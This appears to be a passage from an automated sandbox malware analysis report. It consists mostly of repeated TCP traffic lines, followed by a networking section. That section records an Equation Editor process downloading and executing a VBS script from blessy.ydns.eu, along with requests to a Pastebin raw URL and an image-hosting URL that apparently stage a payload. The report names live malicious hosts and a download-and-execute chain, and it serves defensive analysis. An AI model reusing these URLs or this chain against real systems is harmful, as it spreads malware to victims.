Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exe Domain query: pastebin.com
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 172.67.19.24 443 Jump to behavior
Source: unknown DNS query: name: pastebin.com
Source: unknown DNS query: name: pastebin.com
Source: unknown DNS query: name: pastebin.com
Source: Yara match File source: 8.2.powershell.exe.95d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0356043D URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_0356043D
Source: word.vbs.9.dr Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: word.vbs.9.dr Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: global traffic HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
Source: Joe Sandbox View IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View IP Address: 172.67.215.45 172.67.215.45
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: SKB-ENTERPRISENL SKB-ENTERPRISENL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected: GET /raw/yk0CXsC5 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jimbo/prnportjjm.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: blessy.ydns.euConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0356043D URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_0356043D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\prnportjjm[1].vbs Jump to behavior
Source: global traffic HTTP traffic detected: GET /raw/yk0CXsC5 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic HTTP traffic detected: GET /jimbo/prnportjjm.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: blessy.ydns.euConnection: Keep-Alive
